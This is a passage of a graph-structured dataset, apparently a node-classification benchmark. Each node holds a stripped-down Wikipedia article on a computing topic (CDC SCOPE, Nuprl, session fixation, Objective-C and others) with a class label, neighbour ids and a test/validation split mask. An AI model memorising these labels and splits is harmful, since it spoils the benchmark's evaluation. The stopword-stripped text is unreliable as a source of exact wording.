      4883,
      2325,
      278,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      3643,
      7739,
      7996,
      11583,
      9664,
      9154,
      8133,
      10952,
      81,
      8789,
      7515,
      988,
      3807,
      8032,
      3941,
      2409,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Test"
  },
  {
    "node_id": 10458,
    "label": 2,
    "text": "CDC_SCOPE:cdc scope scope acronym supervisory control program execution name used control data corporation number operating system projects 1960s operating system based original chippewa operating system early 1970s renamed nos/be cdc cyber machines scope operating system file-oriented system using mass storage random access devices designed make use capabilities cdc 6000 computer systems exploits fully multiple-operating modes segments computer main tasks scope controlling job execution storage assignment performing segment overlay loading features include comprehensive input/output functions library maintenance routines dayfile chronologically records jobs run problems encountered aid debugging dumps memory maps available control scope variety assemblers compass compilers algol fortran cobol utility programs sort/merge pert/time export/import respond simscript apt optima etc may operated computer emulation community made repeated attempts recover preserve software running cdc cyber 6000 series emulator screenshot scope 3.1 building scope written programming team sunnyvale california 2,000 miles cdc hardware division considered buggy inefficient piece software though much different many operating systems era cdc arden hills minnesota laboratories referred scope sunnyvale collection programming errors competing operating system mace mansfield cahlander executive greg mansfield dave cahlander authors system started engineering test executive eventually developed complete operating system — modularized rewrite enhancement original chippewa operating system cos never official cdc product copy freely given customer asked one many customers especially advanced ones like university research sites control data decided write next operating system kronos considered current scope system unofficial mace alternative chose abandon scope system base kronos mace software eventually kronos replaced new network operating system nos though many smaller cdc customers continued use scope system rather kronos nos became primary control data operating system customers running mainly batch operations reluctant switch nos system saw benefit shop scope system maintained renamed nos/be batch environment primarily cdc marketing could say mainframe customers using nos operating system",
    "neighbors": [
      512,
      6529,
      2179,
      996,
      9991,
      8136,
      7983,
      5584,
      6675,
      3960,
      25,
      11356
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10459,
    "label": 1,
    "text": "Database_Workbench:database workbench database workbench software application development administration multiple relational databases using sql interoperationality different database systems developed upscene productions databases workbench supports multiple database systems provide software developers interface development environment otherwise different database systems also includes cross database tools database workbench started developer tool specifically interbase interbase workbench initially modeled sql navigator tool oracle database quest software early years interbase became open-source short soon firebird created fork interbase code base main developer database workbench martijn tonies closely involved early development firebird committee member firebird foundation database workbench continued support database systems initially separate firebird workbench release long program became interoperational different database systems initial support multiple database systems led renaming product current title database workbench 2003 also opened path inclusion support database systems support microsoft sql server mysql added 2003 2005 support oracle database nexusdb added sql anywhere support followed 2008 early 2010 full unicode version database workbench released version 5 database workbench released august 2014 free version limited functionality data workbench lite based data workbench 4 also available database workbench supports following relational databases oracle database microsoft sql server sql anywhere firebird nexusdb interbase mysql mariadb postgresql version 5 database workbench runs 32-bit 64 bit windows platforms linux freebsd mac os x database workbench operate using wine database workbench used view create edit tables indexes stored procedures database meta data objects also supports includes several productivity features",
    "neighbors": [
      11392,
      8195,
      6797,
      9360,
      10258,
      5779,
      11030,
      2456,
      3096,
      5403,
      7453,
      1950,
      9503,
      7339,
      9389,
      10413,
      7983,
      9010,
      823,
      9661,
      6721,
      9286,
      5964,
      5198,
      7506,
      9687,
      9177,
      8539,
      1632,
      10340,
      6245,
      8295,
      8683,
      2413,
      7022,
      6383,
      10737,
      3188,
      10873,
      2810
    ],
    "mask": "None"
  },
  {
    "node_id": 10460,
    "label": 9,
    "text": "Nuprl:nuprl nuprl proof development system providing computer-mediated analysis proofs formal mathematical statements tools software verification optimization originally developed 1980s robert lee constable others system maintained prl project cornell university currently supported version nuprl 5 also known fdl formal digital library nuprl functions automated theorem proving system also used provide proof assistance nuprl uses type system based martin-löf intuitionistic type theory model mathematical statements digital library mathematical theories constructed analyzed variety editors including graphical user interface web-based editor emacs mode variety evaluators inference engines operate statements library translators also allow statements manipulated java ocaml programs overall system controlled variant ml nuprl 5 architecture described distributed open architecture intended primarily used web service rather standalone software interested using web service migrating theories older versions nuprl contact email address given nuprl system web page nuprl first released 1984 first described detail book implementing mathematics nuprl proof development system published 1986 nuprl 2 first unix version nuprl 3 provided machine proof mathematical problems related girard paradox higman lemma nuprl 4 first version developed world wide web used verify cache coherency protocols computer systems current system architecture implemented nuprl 5 first proposed 2000 conference paper reference manual nuprl 5 published 2002 nuprl subject many computer science publications recent 2014 jonprl redprl systems also based computational type theory redprl explicitly inspired nuprl",
    "neighbors": [
      5796,
      10020,
      5677,
      6419,
      119,
      4791,
      9816,
      7386,
      6239
    ],
    "mask": "Test"
  },
  {
    "node_id": 10461,
    "label": 5,
    "text": "Multicast_Listener_Discovery:multicast listener discovery multicast listener discovery mld component internet protocol version 6 ipv6 suite mld used ipv6 routers discovering multicast listeners directly attached link much like internet group management protocol igmp used ipv4 protocol embedded icmpv6 instead using separate protocol mldv1 similar igmpv2 mldv2 similar igmpv3 protocol described rfc 3810 updated rfc 4604 several operating system support mldv2",
    "neighbors": [
      10242,
      1411,
      3847,
      649,
      9868,
      3218,
      5653,
      9365,
      10005,
      11413,
      5402,
      4891,
      5531,
      3742,
      10271,
      10144,
      8482,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      3133,
      3006,
      5181,
      5437,
      6724,
      7364,
      710,
      2887,
      8391,
      8265,
      2509,
      4687,
      6352,
      5843,
      6613,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 10462,
    "label": 4,
    "text": "Naemon:naemon naemon open-source computer system monitoring network monitoring infrastructure monitoring software application naemon offers monitoring alerting services servers switches applications services alerts users things go wrong alerts second time problem resolved naemon created 2014 fork nagios available red hat centos suse debian ubuntu linux distribution naemon open source software licensed gnu gpl v2 provides",
    "neighbors": [
      9353,
      5612,
      7983,
      1776,
      3218,
      6523,
      9909,
      1211,
      4797
    ],
    "mask": "None"
  },
  {
    "node_id": 10463,
    "label": 9,
    "text": "Chez_Scheme:chez scheme chez scheme programming language dialect implementation language scheme type lisp uses incremental native-code compiler produce native binary files x86 ia-32 x86-64 powerpc sparc processor architectures supported r6rs standard since version 7.9.1 free open-source software released apache license version 2.0 first released 1985 r. kent dybvig originally licensed proprietary software released open-source software github version 9.4 petite chez scheme sibling implementation uses threaded interpreter design instead chez scheme incremental native-code compiler programs written chez scheme run unchanged petite chez scheme long depend using compiler example foreign function interface available compiler petite chez scheme freely distributable may used royalty fees subject license agreement one series benchmarks chez scheme among fastest available scheme implementations sun sparc processor architecture petite chez scheme among slowest implementations common x86 pentium 32-bit processor architecture chez scheme windowing system computer graphics package called scheme widget library supported portable slib library",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      7392,
      7904,
      11488,
      11495,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      1399,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      11221,
      10712,
      3034,
      3051,
      5611,
      5612,
      499,
      7670,
      11255,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 10464,
    "label": 2,
    "text": "William_John_Sullivan:william john sullivan william john sullivan commonly known john sullivan born december 6 1976 software freedom activist hacker writer john currently executive director free software foundation worked since early 2003 also speaker webmaster gnu project also maintains plannermode delicious-el packages gnu emacs text editor active free software free culture communities sullivan ba philosophy michigan state university mfa writing poetics college sullivan successful policy debater reaching finals ceda nationals semifinals national debate tournament 2007 john main contact behind defective design badvista play ogg campaigns also served chief-webmaster gnu project july 2006 served executive director free software foundation since 2011 john currently delivers speeches following topics english",
    "neighbors": [
      2050,
      7938,
      1028,
      2180,
      4230,
      7812,
      4360,
      8326,
      9865,
      11654,
      4493,
      4367,
      1939,
      2195,
      1813,
      11155,
      2332,
      10012,
      1694,
      10780,
      3744,
      802,
      3618,
      2724,
      4265,
      4011,
      11180,
      9646,
      6962,
      5555,
      823,
      2233,
      9148,
      9660,
      10687,
      10817,
      8258,
      10822,
      5703,
      5833,
      5067,
      4561,
      8147,
      1112,
      2010,
      3674,
      7904,
      1761,
      8673,
      9696,
      3817,
      4841,
      9579,
      1007,
      8304,
      1394,
      8436,
      3068,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 10465,
    "label": 9,
    "text": "Interface_description_language:interface description language interface description language interface definition language idl specification language used describe software component application programming interface api idls describe interface language-independent way enabling communication software components share one language example written c++ written java idls commonly used remote procedure call software cases machines either end link may using different operating systems computer languages idls offer bridge two different systems software systems based idls include sun onc rpc open group distributed computing environment ibm system object model object management group corba implements omg idl idl based dce/rpc data distribution service mozilla xpcom microsoft microsoft rpc evolved com dcom facebook thrift wsdl web services",
    "neighbors": [
      8070,
      8717,
      11661,
      8975,
      6553,
      9114,
      7067,
      6555,
      7580,
      11161,
      5921,
      8100,
      10020,
      5031,
      1407,
      7592,
      10024,
      11303,
      428,
      5677,
      7983,
      8000,
      9665,
      5188,
      9926,
      2120,
      465,
      2644,
      5471,
      9441,
      7018,
      3952,
      5754,
      3323,
      9596,
      3839
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10466,
    "label": 4,
    "text": "Session_fixation:session fixation computer network security session fixation attacks attempt exploit vulnerability system allows one person fixate find set another person session identifier session fixation attacks web based rely session identifiers accepted urls query string post data alice account bank codice_1 mallory intends target alice money bank alice reasonable level trust mallory visit links mallory sends straightforward scenario misconception server accepts server-generated session identifiers safe fixation false scenario like cross-site cookie except rely browser vulnerabilities rather relies fact wildcard cookies set one subdomain affect subdomains scenario attack scenarios result mallory successfully gained access functions data normally reserved alice alternative attack scenario require alice log site rather simply fixing session mallory may able spy alice abuse data enters example mallory may use attacks give alice authenticated session—so alice start using site authentication mallory alice decides purchase something site enters credit card details mallory might able retrieve data confidential data looking historical data stored account type session fixation exploitation differs classic exploitation scenarios since happens unauthenticated part application reverses authentication attacker logging victim session identifiers url query string get variables post variables recommended simplify attack – easy make links forms set get post variables note cookies shared tabs popped browser windows system requires hit domain www.example.com/ code=site1 www.example.com/ code=site2 cookies may conflict one another tabs may required send session identifier url order overcome limitation possible use site1.example.com site2.example.com domain conflicts cookies may incur costs extra ssl certificates behavior seen many sites opening another tab trying side side search results one sessions become unusable attack largely avoided changing session id users log every request specific user requires user authenticated logged site attacker would need know id victim log-in session victim visits link fixed session id however need log account order anything important point session id change attacker able anything important anonymous session id similar technique used solve phishing problem user protects account two passwords solved great extent technique also useful cross-site request forgery attacks session identifier modern systems stored default http cookie moderate level security long session system disregards get/post values however solution vulnerable cross-site request forgery meet statelessness requirement rest enabling https security systems allow applications obtain ssl tls session identifier use ssl/tls session identifier secure many web development languages provide robust built-in functionality ssl/tls session identifiers may suitable critical applications large financial sites due size systems issue however rarely debated even security forums countermeasure session fixation generate new session identifier sid request done even though attacker may trick user accepting known sid sid invalid attacker attempts re-use sid implementation system simple demonstrated following example mallory successfully tricks alice visiting codice_24 http request sent codice_25 codice_25 accepts codice_27 would normally bad however codice_25 secure performs session regeneration codice_25 gets following response alice use codice_30 unknown mallory codice_27 invalid mallory thus unsuccessful session fixation attempt unfortunately session regeneration always possible problems known occur third-party software activex java applets used browser plugins communicate server third-party software could cause logouts session could split two separate sessions implementation sessions includes transmitting sid get post variables might also render back button browsers unusable user would using older invalid session identifier previous request one way improve security accept session identifiers generated server however noted prevent session fixation attacks isset _session 'server_generated_sid session_regenerate_id // generate new session identifier _session 'server_generated_sid true logout function useful allows users indicate session allow requests thus attacks effective session active note following code performs cross-site request forgery checks potentially allowing attacker force users log web application logout defense simple implement advantage providing measure protection unauthorized users accessing authorized user account using machine may left unattended store session variable containing time stamp last access made sid sid used compare current timestamp one stored session difference greater predefined number say 5 minutes destroy session otherwise update session variable current timestamp visiting page browsers set referrer – page contained link followed get page user logged site likely linked outside site e.g. banking websites webmail site kind site users would remain logged great length time referrer site referrer considered suspicious however originating request https page referrer stripped depend security system example codice_8 could employ following security check strpos _server 'http_referer 'http //vulnerable.example.com/ == 0 session_regenerate_id // generate new session identifier one way improve security ensure user appears end user client makes bit harder perform session fixation attacks networks begin conform rfc 3704 anti-spoofing practices ip address becomes reliable source identifier therefore security web site improved verifying source ip address consistent throughout session could performed manner _server 'remote_addr _session 'prev_remoteaddr session_regenerate_id // generate new session identifier _session 'prev_remoteaddr _server 'remote_addr however points consider employing approach sites added security outweighs lack convenience others browsers identify user-agent http headers header normally change use would extremely suspicious happen web application might make use user-agent detection attempt prevent malicious users stealing sessions however trivial bypass attacker easily capture victim user-agent site spoof attack proposed security system relying security obscurity _server 'http_user_agent _session 'prev_useragent session_regenerate_id // generate new session identifier _session 'prev_useragent _server 'http_user_agent however points consider employing approach user agent may change legally cases following examples users defense depth combine several countermeasures idea simple one obstacle trivial overcome several obstacles could hard overcome defense depth strategy could involve http referrers passed ssl/tls https following php script demonstrates several countermeasures combined defense depth manner isset _get 'logout || session_regenerate_id // generate new session identifier _session 'prev_useragent _server 'http_user_agent _session 'prev_remoteaddr _server 'remote_addr note code checks current remote_addr user ip address user-agent remote_addr user-agent previous request might inconvenient sites discussed",
    "neighbors": [
      450,
      4163,
      2470,
      488,
      6750,
      7965,
      10442,
      3473,
      10579,
      87,
      10232,
      7324,
      6269,
      5470
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10467,
    "label": 4,
    "text": "ITSEC:itsec information technology security evaluation criteria itsec structured set criteria evaluating computer security within products systems itsec first published may 1990 france germany netherlands united kingdom based existing work respective countries following extensive international review version 1.2 subsequently published june 1991 commission european communities operational use within evaluation certification schemes since launch itsec 1990 number european countries agreed recognize validity itsec evaluations itsec largely replaced common criteria provides similarly-defined evaluation levels implements target evaluation concept security target document product system evaluated called target evaluation subjected detailed examination security features culminating comprehensive informed functional penetration testing degree examination depends upon level confidence desired target provide different levels confidence itsec defines evaluation levels denoted e0 e6 higher evaluation levels involve extensive examination testing target unlike earlier criteria notably tcsec developed us defense establishment itsec require evaluated targets contain specific technical features order achieve particular assurance level example itsec target might provide authentication integrity features without providing confidentiality availability given target security features documented security target document whose contents evaluated approved target evaluated itsec evaluation based exclusively verifying security features identified security target formal z notation used prove security properties mondex smart card electronic cash system allowing achieve itsec level e6 highest granted security-level classification",
    "neighbors": [
      4067,
      5636,
      8904,
      3594,
      4988
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10468,
    "label": 3,
    "text": "Socket_370:socket 370 socket 370 also known pga370 socket cpu socket first used intel pentium iii celeron processors first complement later replace older slot 1 cpu interface personal computers 370 refers number pin holes socket cpu pins socket 370 replaced socket 423 2000 socket 370 started budget oriented platform 66 mhz fsb ppga mendocino celeron cpus late 1998 move on-die l2 cache removed need pcb design seen slot 1 late 1999 late 2000 intel main desktop socket 100/133 mhz fsb coppermine pentium iiis 2001 tualatin pentium iii processors brought changes infrastructure required dedicated tualatin-compatible motherboards manufacturers would indicate blue instead white socket late sockets typically compatible coppermine processors older mendocino celerons motherboards used socket 370 support intel processors dual cpu configurations others allowed use socket 370 slot 1 cpu although time via-cyrix cyrix iii later renamed via c3 also used socket 370 weight socket 370 cpu cooler exceed 180 grams 6.3 ounces heavier coolers may result damage die system properly handled intel socket 370 processors pentium iii celeron following mechanical maximum load limits exceeded heat sink assembly shipping conditions standard use load limits crack processor die make unusable intel socket 370 processors integrated heat sink pentium iii celeron 1.13–1.4 ghz following mechanical maximum load limits exceeded heatsink assembly shipping conditions standard use load limits crack processor die make unusable",
    "neighbors": [
      3588,
      5901,
      5523,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      3883,
      2604,
      4523,
      2350,
      6192,
      9649,
      3892,
      4537,
      7744,
      7105,
      2500,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      3317,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 10469,
    "label": 9,
    "text": "Program_optimization:program optimization computer science program optimization software optimization process modifying software system make aspect work efficiently use fewer resources general computer program may optimized executes rapidly make capable operating less memory storage resources draw less power although word optimization shares root optimal rare process optimization produce truly optimal system system generally made optimal absolute terms respect given quality metrics may contrast possible metrics result optimized system typically optimal one application one audience one might reduce amount time program takes perform task price making consume memory application memory space premium one might deliberately choose slower algorithm order use less memory often one size fits design works well cases engineers make trade-offs optimize attributes greatest interest additionally effort required make piece software completely optimal — incapable improvement — almost always reasonable benefits would accrued process optimization may halted completely optimal solution reached fortunately often case greatest improvements come early process optimization occur number levels typically higher levels greater impact harder change later project requiring significant changes complete rewrite need changed thus optimization typically proceed via refinement higher lower initial gains larger achieved less work later gains smaller requiring work however cases overall performance depends performance low-level portions program small changes late stage early consideration low-level details outsized impact typically consideration given efficiency throughout project – though varies significantly – major optimization often considered refinement done late ever longer-running projects typically cycles optimization improving one area reveals limitations another typically curtailed performance acceptable gains become small costly performance part specification program – program unusably slow fit purpose video game 60 hz frames-per-second acceptable 6 frames-per-second unacceptably choppy – performance consideration start ensure system able deliver sufficient performance early prototypes need roughly acceptable performance confidence final system optimization achieve acceptable performance sometimes omitted belief optimization always done later resulting prototype systems far slow – often order magnitude – systems ultimately failures architecturally achieve performance goals intel 432 1981 ones take years work achieve acceptable performance java 1995 achieved acceptable performance hotspot 1999 degree performance changes prototype production system amenable optimization significant source uncertainty risk highest level design may optimized make best use available resources given goals constraints expected use/load architectural design system overwhelmingly affects performance example system network latency-bound network latency main constraint overall performance would optimized minimize network trips ideally making single request requests push protocol rather multiple roundtrips choice design depends goals designing compiler fast compilation key priority one-pass compiler faster multi-pass compiler assuming work speed output code goal slower multi-pass compiler fulfills goal better even though takes longer choice platform programming language occur level changing frequently requires complete rewrite though modular system may allow rewrite component – example python program may rewrite performance-critical sections c. distributed system choice architecture client-server peer-to-peer etc occurs design level may difficult change particularly components replaced sync e.g. old clients given overall design good choice efficient algorithms data structures efficient implementation algorithms data structures comes next design choice algorithms data structures affects efficiency aspect program generally data structures difficult change algorithms data structure assumption performance assumptions used throughout program though minimized use abstract data types function definitions keeping concrete data structure definitions restricted places algorithms primarily consists ensuring algorithms constant 1 logarithmic log n linear n cases log-linear n log n input space time algorithms quadratic complexity n fail scale even linear algorithms cause problems repeatedly called typically replaced constant logarithmic possible beyond asymptotic order growth constant factors matter asymptotically slower algorithm may faster smaller simpler asymptotically faster algorithm faced small input may case occurs reality often hybrid algorithm provide best performance due tradeoff changing size general technique improve performance avoid work good example use fast path common cases improving performance avoiding unnecessary work example using simple text layout algorithm latin text switching complex layout algorithm complex scripts devanagari another important technique caching particularly memoization avoids redundant computations importance caching often many levels caching system cause problems memory use correctness issues stale caches beyond general algorithms implementation abstract machine concrete source code level choices make significant difference example early c compilers codice_1 slower codice_2 unconditional loop codice_1 evaluated 1 conditional jump tested true codice_4 unconditional jump optimizations one nowadays performed optimizing compilers depends source language target machine language compiler difficult understand predict changes time key place understanding compilers machine code improve performance loop-invariant code motion return value optimization examples optimizations reduce need auxiliary variables even result faster performance avoiding round-about optimizations source compile level directives build flags used tune performance options source code compiler respectively using preprocessor defines disable unneeded software features optimizing specific processor models hardware capabilities predicting branching instance source-based software distribution systems bsd ports gentoo portage take advantage form optimization use optimizing compiler tends ensure executable program optimized least much compiler predict lowest level writing code using assembly language designed particular hardware platform produce efficient compact code programmer takes advantage full repertoire machine instructions many operating systems used embedded systems traditionally written assembler code reason programs small programs seldom written start finish assembly due time cost involved compiled high level language assembly hand optimized efficiency size less important large parts may written high-level language modern optimizing compilers greater complexity recent cpus harder write efficient code compiler generates projects need ultimate optimization step much code written today intended run many machines possible consequence programmers compilers n't always take advantage efficient instructions provided newer cpus quirks older models additionally assembly code tuned particular processor without using instructions might still suboptimal different processor expecting different tuning code typically today rather writing assembly language programmers use disassembler analyze output compiler change high-level source code compiled efficiently understand inefficient just-in-time compilers produce customized machine code based run-time data cost compilation overhead technique dates earliest regular expression engines become widespread java hotspot v8 javascript cases adaptive optimization may able perform run time optimization exceeding capability static compilers dynamically adjusting parameters according actual input factors profile-guided optimization ahead-of-time aot compilation optimization technique based run time profiles similar static average case analog dynamic technique adaptive optimization self-modifying code alter response run time conditions order optimize code common assembly language programs cpu designs perform optimizations run time examples include out-of-order execution speculative execution instruction pipelines branch predictors compilers help program take advantage cpu features example instruction scheduling code optimization also broadly categorized platform-dependent platform-independent techniques latter ones effective platforms platform-dependent techniques use specific properties one platform rely parameters depending single platform even single processor writing producing different versions code different processors might therefore needed instance case compile-level optimization platform-independent techniques generic techniques loop unrolling reduction function calls memory efficient routines reduction conditions etc impact cpu architectures similar way great example platform-independent optimization shown inner loop observed loop inner loop performs computations per unit time loop without one inner loop generally serve reduce total instruction path length required complete program and/or reduce total memory usage process hand platform-dependent techniques involve instruction scheduling instruction-level parallelism data-level parallelism cache optimization techniques i.e. parameters differ among various platforms optimal instruction scheduling might different even different processors architecture computational tasks performed several different ways varying efficiency efficient version equivalent functionality known strength reduction example consider following c code snippet whose intention obtain sum integers 1 n code assuming arithmetic overflow rewritten using mathematical formula like optimization sometimes performed automatically optimizing compiler select method algorithm computationally efficient retaining functionality see algorithmic efficiency discussion techniques however significant improvement performance often achieved removing extraneous functionality optimization always obvious intuitive process example optimized version might actually slower original version n sufficiently small particular hardware happens much faster performing addition looping operations multiplication division cases however optimization relies using elaborate algorithms making use special cases special tricks performing complex trade-offs fully optimized program might difficult comprehend hence may contain faults unoptimized versions beyond eliminating obvious antipatterns code level optimizations decrease maintainability optimization generally focus improving one two aspects performance execution time memory usage disk space bandwidth power consumption resource usually require trade-off — one factor optimized expense others example increasing size cache improves run time performance also increases memory consumption common trade-offs include code clarity conciseness instances programmer performing optimization must decide make software better operations cost making operations less efficient trade-offs may sometimes non-technical nature — competitor published benchmark result must beaten order improve commercial success comes perhaps burden making normal usage software less efficient changes sometimes jokingly referred pessimizations optimization may include finding bottleneck system – component limiting factor performance terms code often hot spot – critical part code primary consumer needed resource – though another factor i/o latency network bandwidth computer science resource consumption often follows form power law distribution pareto principle applied resource optimization observing 80 resources typically used 20 operations software engineering often better approximation 90 execution time computer program spent executing 10 code known 90/10 law context complex algorithms data structures perform well many items simple algorithms suitable small amounts data — setup initialization time constant factors complex algorithm outweigh benefit thus hybrid algorithm adaptive algorithm may faster single algorithm performance profiler used narrow decisions functionality fits conditions cases adding memory help make program run faster example filtering program commonly read line filter output line immediately uses enough memory one line performance typically poor due latency disk read caching result similarly effective though also requiring larger memory use optimization reduce readability add code used improve performance may complicate programs systems making harder maintain debug result optimization performance tuning often performed end development stage donald knuth made following two statements optimization forget small efficiencies say 97 time premature optimization root evil yet pass opportunities critical 3 premature optimization phrase used describe situation programmer lets performance considerations affect design piece code result design clean could code incorrect code complicated optimization programmer distracted optimizing deciding whether optimize specific part program amdahl law always considered impact overall program depends much much time actually spent specific part always clear looking code without performance analysis better approach therefore design first code design profile/benchmark resulting code see parts optimized simple elegant design often easier optimize stage profiling may reveal unexpected performance problems would addressed premature optimization practice often necessary keep performance goals mind first designing software programmer balances goals design optimization modern compilers operating systems efficient intended performance increases often fail materialize example caching data application level cached operating system level yield improvements execution even rare case programmer remove failed optimizations production code also true advances hardware often obviate potential improvements yet obscuring code persist future long purpose negated optimization code development using macros takes different forms different languages procedural languages c c++ macros implemented using token substitution nowadays inline functions used type safe alternative many cases cases inlined function body undergo compile-time optimizations compiler including constant folding may move computations compile time many functional programming languages macros implemented using parse-time substitution parse trees/abstract syntax trees claimed makes safer use since many cases interpretation used one way ensure computations performed parse-time sometimes way lisp originated style macro macros often called lisp-like macros similar effect achieved using template metaprogramming c++ cases work moved compile-time difference c macros one side lisp-like macros c++ template metaprogramming side latter tools allow performing arbitrary computations compile-time/parse-time expansion c macros perform computation relies optimizer ability perform additionally c macros directly support recursion iteration turing complete optimization however often difficult predict tools impact project complete see also optimization automated compilers performed programmers gains usually limited local optimization larger global optimizations usually powerful optimization find superior algorithm optimizing whole system usually undertaken programmers complex automated optimizers situation programmers system administrators explicitly change code overall system performs better although produce better efficiency far expensive automated optimizations since many parameters influence program performance program optimization space large meta-heuristics machine learning used address complexity program optimization use profiler performance analyzer find sections program taking resources — bottleneck programmers sometimes believe clear idea bottleneck intuition frequently wrong optimizing unimportant piece code typically little help overall performance bottleneck localized optimization usually starts rethinking algorithm used program often particular algorithm specifically tailored particular problem yielding better performance generic algorithm example task sorting huge list items usually done quicksort routine one efficient generic algorithms characteristic items exploitable example already arranged particular order different method used even custom-made sort routine programmer reasonably sure best algorithm selected code optimization start loops unrolled lower loop overhead although often lead lower speed overloads cpu cache data types small possible used integer arithmetic used instead floating-point see algorithmic efficiency article techniques performance bottlenecks due language limitations rather algorithms data structures used program sometimes critical part program re-written different programming language gives direct access underlying machine example common high-level languages like python modules written c greater speed programs already written c modules written assembly programs written use inline assembler rewriting sections pays circumstances general rule thumb known 90/10 law states 90 time spent 10 code 10 time remaining 90 code putting intellectual effort optimizing small part program huge effect overall speed — correct part located manual optimization sometimes side effect undermining readability thus code optimizations carefully documented preferably using in-line comments effect future development evaluated program performs automated optimization called optimizer optimizers embedded compilers operate compilation optimizers often tailor generated code specific processors today automated optimizations almost exclusively limited compiler optimization however compiler optimizations usually limited fixed set rather general optimizations considerable demand optimizers accept descriptions problem language-specific optimizations allowing engineer specify custom optimizations tools accept descriptions optimizations called program transformation systems beginning applied real software systems c++ high-level languages eiffel esterel optimize programs using intermediate language grid computing distributed computing aims optimize whole system moving tasks computers high usage computers idle time sometimes time taken undertake optimization therein may issue optimizing existing code usually add new features worse might add new bugs previously working code change might manually optimized code might sometimes less readability unoptimized code optimization might impact maintainability well optimization comes price important sure investment worthwhile automatic optimizer optimizing compiler program performs code optimization may optimized either improve efficiency target programs else speed operation compilation performed optimization turned usually takes longer although usually problem programs quite large particular just-in-time compilers performance run time compile component executing together target code key improving overall execution speed",
    "neighbors": [
      5896,
      1801,
      6926,
      788,
      9112,
      1952,
      8609,
      2339,
      4775,
      3624,
      8231,
      7983,
      9141,
      8502,
      5948,
      2620,
      6718,
      2623,
      8640,
      9151,
      4930,
      9788,
      5956,
      8262,
      7627,
      10703,
      10584,
      477,
      2666,
      2283,
      8554,
      2798,
      8815,
      10734,
      9330,
      4980,
      11003,
      2045,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 10470,
    "label": 2,
    "text": "Objective-C:objective-c objective-c general-purpose object-oriented programming language adds smalltalk-style messaging c programming language main programming language supported apple macos ios ipados operating systems respective application programming interfaces apis cocoa cocoa touch introduction swift programming language objective-c originally developed early 1980s selected main language used next nextstep operating system macos ios derived portable objective-c programs use cocoa cocoa touch libraries using parts may ported reimplemented systems also compiled system supported gnu compiler collection gcc clang objective-c source code 'implementation program files usually filename extensions objective-c 'header/interface files extensions c header files objective-c++ files denoted file extension objective-c created primarily brad cox tom love early 1980s company stepstone introduced smalltalk itt corporation programming technology center 1981 earliest work objective-c traces back around time cox intrigued problems true reusability software design programming realized language like smalltalk would invaluable building development environments system developers itt however tom love also recognized backward compatibility c critically important itt telecom engineering milieu cox began writing pre-processor c add abilities smalltalk soon working implementation object-oriented extension c language called oopc object-oriented pre-compiler love hired schlumberger research 1982 opportunity acquire first commercial copy smalltalk-80 influenced development brainchild order demonstrate real progress could made cox showed making interchangeable software components really needed practical changes existing tools specifically needed support objects flexible manner come supplied usable set libraries allow code resources needed code bundled one cross-platform format love cox eventually formed new venture productivity products international ppi commercialize product coupled objective-c compiler class libraries 1986 cox published main description objective-c original form book object-oriented programming evolutionary approach although careful point problem reusability language objective-c often found compared feature feature languages 1988 next licensed objective-c stepstone new name ppi owner objective-c trademark extended gcc compiler support objective-c. next developed appkit foundation kit libraries nextstep user interface interface builder based next workstations failed make great impact marketplace tools widely lauded industry led next drop hardware production focus software tools selling nextstep openstep platform custom programming order circumvent terms gpl next originally intended ship objective-c frontend separately allowing user link gcc produce compiler executable initially accepted richard m. stallman plan rejected stallman consulted gnu lawyers next agreed make objective-c part gcc work extend gcc led steve naroff joined next stepstone compiler changes made available per gpl license terms runtime libraries rendering open source contribution unusable general public led parties developing runtime libraries open source license later steve naroff also principal contributor work apple build objective-c frontend clang gnu project started work free software implementation cocoa named gnustep based openstep standard dennis glatting wrote first gnu objective-c runtime 1992 gnu objective-c runtime use since 1993 one developed kresten krab thorup university student denmark thorup also worked next 1993 1996 acquiring next 1996 apple computer used openstep then-new operating system mac os x included objective-c next objective-c-based developer tool project builder interface design tool interface builder merged one application xcode apple current cocoa api based openstep interface objects significant objective-c environment used active development wwdc 2014 apple introduced new language swift characterized objective-c without c objective-c thin layer atop c strict superset c meaning possible compile c program objective-c compiler freely include c language code within objective-c class objective-c derives object syntax smalltalk syntax non-object-oriented operations including primitive variables pre-processing expressions function declarations function calls identical c syntax object-oriented features implementation smalltalk-style messaging objective-c model object-oriented programming based message passing object instances objective-c one call method one sends message unlike simula-style programming model used c++ difference two concepts code referenced method message name executed simula-style language method name cases bound section code target class compiler smalltalk objective-c target message resolved runtime receiving object interpreting message method identified selector — unique identifier message name often -terminated string representing name — resolved c method pointer implementing consequence message-passing system type checking object message directed — receiver — guaranteed respond 